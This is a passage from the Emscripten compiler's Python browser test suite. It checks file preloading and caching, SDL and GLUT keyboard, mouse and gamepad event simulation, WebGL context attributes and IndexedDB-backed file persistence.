self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file runs xhr.onload with a status different from 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-s', 'ENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch a 'gamepadconnected' event (required for the glfw joystick test; the SDL test does not use it)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the attributes we want to test in the WebGL implementation
# (request the attribute, create a context, and then check its value in the resulting context attributes).
# Tests still succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
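# Persistence test: the first invocation (-DFIRST with a preloaded moar.txt) stores the secret, and later
# invocations are expected to read the same secret back from persistent browser storage, even when a
# different file is preloaded over it.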
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
